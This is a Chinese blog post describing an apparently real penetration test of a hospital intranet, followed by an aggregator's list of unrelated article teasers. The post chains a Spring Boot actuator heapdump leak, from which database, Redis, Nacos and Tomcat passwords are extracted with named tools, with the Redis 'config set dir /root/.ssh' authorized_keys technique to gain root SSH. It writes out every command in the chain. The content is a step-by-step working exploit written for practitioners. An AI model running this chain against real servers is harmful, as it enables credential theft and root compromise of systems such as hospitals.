某医院的实战渗透测试(组合拳)

news2024/11/16 18:06:48

实战渗透

    • 一、前言
    • 二、Spring信息泄露
    • 三、Redis写公钥
    • 四、文章来源

一、前言

项目是内网环境下进行,所以通过vpn接入内网之后进行目标系统的测试。(信息泄露+redis写公钥)

二、Spring信息泄露

访问客户给的目标地址通过代理把流量转给了BurpSuite,然后插件就爆了一个spring的信息泄露。

spring信息泄露有很多路径,但是evn这种路径的密码基本上是加密的,会用星号进行脱敏,解密可以看这下面师傅写的文章(我没复现,因为我菜,只会玩heapdump)。

https://blog.51cto.com/u_12632800/4998813

https://www.hacking8.com/bug-product/Spring-Boot/Spring-Boot-%E8%8E%B7%E5%8F%96%E8%A2%AB%E6%98%9F%E5%8F%B7%E8%84%B1%E6%95%8F%E7%9A%84%E5%AF%86%E7%A0%81%E7%9A%84%E6%98%8E%E6%96%87.html

发现存在heapdump路径,访问/web/actuator/heapdump进行下载。

heapdump也叫堆转储文件,是java进程在某个时间点的内存快照,里面可能会包含数据库账号密码、shiro的key、阿里云的key等。

下载下来的heapdump文件,可以使用工具进行内容检索,下面为几个常用的heapdump查看工具。

https://github.com/wyzxxz/heapdump_tool(比较常用)

https://github.com/whwlsfb/JDumpSpider(用法简单)

https://docs.oracle.com/javase/6/docs/technotes/tools/share/jvisualvm.html,这个是jdk自带的工具,供开发者用于监视,故障排除。

使用方法可以查看该师傅的博客:https://blog.csdn.net/gw5205566/article/details/105666637

输入password则可以查看携带password的字段。

在里面找到数据库root的密码,同时还有redis、nacos、tomcat的密码。没有找到shiro的key,不然运气好的话还能来个RCE。

第二个工具比较方便是因为一条命令他就会把有用的信息输出出来。

在这里插入图片描述
在这里插入图片描述

看起来比较舒服。

三、Redis写公钥

因为redis不出网,纯内网环境,同时我们是vpn接入不是在现场,路由的问题没办法反弹shell,所以用redis写公钥来进行下一步攻击。

1、 ssh-keygen -t rsa //执行生成key命令

2、(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt //将公钥写入txt

在这里插入图片描述

3、cat /root/.ssh/key.txt | redis-cli -h 172.16.198.244 -a redis -x set xxx //将.ssh目录下的公钥文件1.txt 通过redis-cli客户端写入到目标主机缓冲中,-a是因为redis存在密码,而不是未授权。

在这里插入图片描述

4、连接redis进行

redis-cli -h 172.16.198.244 -p 6379 -a redis //使用客户端登录目标

config set dir /root/.ssh //设置存储公钥路径,redis的备份路径

config get dir //查看是否设置成功

config set dbfilename "authorized_keys" //设置文件名称

save //保存

在这里插入图片描述

5、 ssh -i id_rsa root@172.16.198.244 //进行ssh连接即可

在这里插入图片描述

ps:也可以把id_rsa转换为PEM格式。

在这里插入图片描述

然后把生成的id_rsa文件导入到finalshell,用户名是root,即可连接。

在这里插入图片描述

在这里插入图片描述

导入成功之后使用该密钥就可以连接。

在这里插入图片描述

四、文章来源

文章作者:知识星球《网络安全情报攻防站-PowerShell_1》
文章链接:https://t.zsxq.com/09deFts5r

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/150748.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

零基础学软件测试有前途吗?

随着软件工程活动的不断演化,测试工作某种程度上是可以很大幅度提高软件的产品质量以及提升用户的使用满意度,因此软件测试工程师的地位在企业中也越来越受到重视。不少零基础学IT的朋友也开始把软件测试作为一个绝佳的选择对象,那么零基础学…

leetcode.1806 还原排列的最少操作步数 - 模拟 + lcm

​​​​​​1806. 还原排列的最少操作步数 本题是数论题 共介绍4种解题方法 目录 1、所有置换环长度的最小公倍数 2、最小操作数是最大环长度 3、1或n-2所在环长度即为最大置换环长度 4、暴力模拟 思路: 因为数据范围很小 所以可以直接模拟 也可以优化一下—…

Python 模型训练:LSTM 时间序列销售额预测(训练、保存、调用)

LSTM (long short-term memory) 长短期记忆网络,具体理论的就不一一叙述,直接开始 流程一、数据导入二、数据归一化三、划分训练集、测试集四、划分标签和属性五、转换成 LSTM 输入格式六、设计 LSTM 模型6.1 直接建模6.2 找最好七、测试与图形化展示八、…

JavaSE-07

字节流输入输出数据: InputStream和OutputStream作为字节流输入输出流的超类。 字节流写数据时千万记得close关闭资源,可设置追加写为true 字节流读数据时,FileInputStream a new FileInputStream (“”); int by a.read(); char b (char…

隐蔽信道学习

隐蔽信道作为一种能够在不被系统感知的情况下稳定窃取秘密信息的通信手段,尽管其带宽通常较低,但其设计上的复杂性和多样性,使得常规的流量审计系统难以对抗或检测。同时,隐蔽信道也是密钥、身份认证、商业机密等秘密信息传输的重…

基于JAVA SSM框架的新闻管理系统源码+数据库,实现 登录 、 注册、 新闻内容、类别、评论、个人信息、系统管理等功能

[基于SSM框架的新闻管理系统] 前言 下载地址:基于JAVA SSM框架的新闻管理系统源码数据库 基于SSM框架的新闻管理系统; 实现 登录 、 注册 、 新闻内容、类别、评论、个人信息、系统管理等功能 ; 可继续完善增加前端、等其他功能等&#x…

federated引擎实现mysql跨服务器表连接

📢作者: 小小明-代码实体 📢博客主页:https://blog.csdn.net/as604049322 📢欢迎点赞 👍 收藏 ⭐留言 📝 欢迎讨论! 📢本文链接:https://xxmdmst.blog.csdn.n…

IU5066 高耐压带OVP保护1.2A单节锂电池线性充电IC

概要 IU5066E是面向空间受限便携应用的,高度集成锤离子和锤聚合物线性充电器器件。该器件由USB端口或交流适配器供电。带输入过压保护的高输入电压范围支持低成本、非稳压适配器。 电池充电经历以下三个阶段: 涓流、电流、恒压。在所有充电阶段&#x…

JSON对象(javascript)

本文内容主要包括了对于JS中JSON对象的一些内容。我们知道JSON格式是前后端进行信息交换的中介信息格式。适用于取代XML格式的一种格式,在多数编程语言中都有关于JSON的处理方法。那么javascript也提供了JSON对象用于处理相应的数据。 1. 什么是JSON格式&#xff1…

mac安装jdkidea配置jdk

第一步:mac安装jdk1、下载jdk,下载地址:https://www.oracle.com/java/technologies/downloads/#java82、安装后,终端输入java -version查看java是否安装成功3、配置环境变量a.在终端输入 /usr/libexec/java_home 可以得到JAVA_HOM…

【矩阵论】5. 线性空间与线性变换——线性映射与自然基分解,线性变换

矩阵论 1. 准备知识——复数域上矩阵,Hermite变换) 1.准备知识——复数域上的内积域正交阵 1.准备知识——Hermite阵,二次型,矩阵合同,正定阵,幂0阵,幂等阵,矩阵的秩 2. 矩阵分解——SVD准备知识——奇异值…

深度学习人体解析

人体解析旨在将图像或视频中的人体分割成多个像素级的语义部分。在过去的十年中,它在计算机视觉社区中获得了极大的兴趣,并在广泛的实际应用中得到了应用,从安全监控到社交媒体,再到视觉特效,这只是其中的一小部分。尽…

Markdown语法大全(够你用一辈子)

标题 # 一级标题 ## 二级标题 ### 三级标题 #### 四级标题 ##### 五级标题 ###### 六级标题一级标题 二级标题 三级标题 四级标题 五级标题 六级标题 文本样式 > 引用文本 > 最外层 > > 第一层嵌套 > > > 第二层嵌套引用文本 最外层 第一层嵌套 第二层…

js中的call和apply

js中的call和apply1.call()可以调用某一函数2.call()可以这个函数的this指向3.call()也可以接受参数每次看到js中的call方法,都是懵逼的要去查查百度,自己研究记录下1.call()可以调用某一函数 testCall() {let person {fullName: function () {console.…

webpack基本使用

1、内置模块path (1)path模块用于对路径和文件进行处理,提供了很多好用的方法。 (2)我们知道在Mac OS、Linux和window上的路径时不一样的 window上会使用 \或者 \\ 来作为文件路径的分隔符,当然目前也支…

SpringBoot+VUE前后端分离项目学习笔记 - 【17 SpringBoot文件上传下载功能 MD5实现文件唯一标识】

Sql 数据库新建sys_file用来保存上传文件信息 CREATE TABLE sys_file (id int(11) NOT NULL AUTO_INCREMENT COMMENT id,name varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL COMMENT 文件名称,type varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL COMMENT 文…

STM32——I2C通信

文章目录I2C通信使用I2C通信的硬件设备硬件电路I2C时序基本单元起始与终止发送接收发送应答与接收应答I2C时序指定地址写当前地址读指定地址读连续读与写MPU6050简介MPU6050参数硬件电路MPU6050框图系统时钟MPU6050的中断源寄存器映像软件I2C读写MPU6050电路设计关键代码I2C通信…

C语言-扫雷

文章目录完整扫雷1. 说明2. 思路3. 各个功能实现3.1 雷盘初始化与打印1)雷盘定义2) 随机布置雷3.2 玩家排查雷1) 获取坐标周围雷数2) 递归展开3)胜负判断3) 显示雷位置4. 游戏试玩5. 游戏完整代码game.htes…

【定时任务】---- xxl-job、@Scheduled

一、Scheduled注解实现的定时任务 要实现计划任务,首先通过在配置类注解EnableScheduling来开启对计划任务的支持,然后在要执行计划任务的方法上注解Scheduled,声明这是一个计划任务。 在Spring Boot 的入口类 XXXApplication 中,必然会有S…

东南大学洪伟教授评述:毫米波与太赫兹技术

今日推荐文章作者为东南大学毫米波国家重点实验室主任、IEEE Fellow 著名毫米波专家洪伟教授,本文选自《毫米波与太赫兹技术》,发表于《中国科学: 信息科学》2016 年第46卷第8 期——《信息科学与技术若干前沿问题评述专刊》。 本文概要介绍了毫米波与太…